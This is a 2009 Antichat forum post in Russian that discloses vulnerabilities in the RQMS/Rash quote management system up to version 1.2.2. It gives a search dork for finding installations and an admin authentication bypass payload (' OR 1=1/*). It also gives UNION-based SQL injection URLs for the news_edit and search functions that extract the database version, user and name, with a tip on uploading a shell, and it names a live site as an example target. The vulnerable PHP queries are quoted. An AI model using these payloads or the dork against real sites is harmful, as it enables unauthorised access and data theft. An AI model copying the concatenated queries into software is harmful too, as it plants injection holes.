ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимости RQMS
  #1  
Старый 04.01.2009, 18:13
Аватар для Dimi4
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458

Репутация: 3965


Отправить сообщение для Dimi4 с помощью ICQ
По умолчанию Уязвимости RQMS

Уязвимости RQMS
RQMS - Rash Quote Management System

Достаточно популяный движок цитатника. Главная слабость - обход авторизации при админке (
URL: http://rqms.sourceforge.net
Version: <=1.2.2
Founded by: Dimi4
Dork:: "Rash Version: 1.2.1"


Обход авторизации
Need: magic_quotes_gpc = OFF


Код:
http://127.0.0.1/rash-v1.2.2/?admin
Вместо логина вводим:
Код:
' OR 1=1/*
Уязвимый код:

PHP код:
    case 'adminlogin':
        include(
'config.php');
        
$sql "SELECT * FROM `" $rashusers "` WHERE `user` ='" $_POST['user'] . "' AND `password` ='" md5($_POST['password']) . "'";
        while(
$row mysql_fetch_array(database_connect($sql))){
            
$section='0';
            
//setting cookies
            
adminpanel();  //    (template)_admin.php in templates folder by default
            
exit();
        } 
Пример:http://nocude.maisum.net/?admin

Sql-inj
Need: magic_quotes_gpc = OFF, admin user

Код:
http://127.0.0.1/rash-v1.2.2/?news_edit&id=4'+union+select+1,concat_ws(0x3a,version(),user(),database()),3/*
Можно заюзать для заливки шелла(если file_priv = Y)
Уязвимый код:
(function content(), index.php)
PHP код:
include('config.php');
                
$nID $_GET['id'];
                
$sql "SELECT * FROM `" $newstable "` WHERE `id` = '" $nID "'";
                
news_change($sql); // output.php 
Sql-inj in Search
Need: magic_quotes_gpc = OFF,

Идем в http://127.0.0.1/VULN/rash-v1.2.2/?search
Вместо фразы тыкаем:
Код:
' union select database(),version(),user(),4,5,6/*
Уязвимый код:


PHP код:
$quote $_POST['search'];
        
$sortby $_POST['sortby'];
        
$number $_POST['number'];
        if(
$sortby == 'rating'){
            
$how 'desc';
        }
        if(
$sortby == 'id'){
            
$how 'asc';
        }
        
$sql "SELECT * FROM `" $quotetable "` WHERE `quote` LIKE '%" $quote "%' ORDER BY `" $sortby "` " $how " LIMIT " $number;
        
quote_format($sql0);        // output.php 

Последний раз редактировалось Dimi4; 04.01.2009 в 18:17..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей vBulletin] bandera Форумы 74 07.06.2010 16:19
Переполнение буфера в Kaspersky Anti-Virus bul666 Мировые новости 9 15.08.2009 15:08
В Windows Mobile найдено две уязвимости ground_zero Мировые новости 1 06.02.2007 11:40
Множественные уязвимости в INVISION POWER BOARD 2.1.x GreenBear Уязвимости 6 02.03.2006 21:36
Современные информационные угрозы, четвертый квартал 2005 dinar_007 Мировые новости 3 28.01.2006 01:49



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ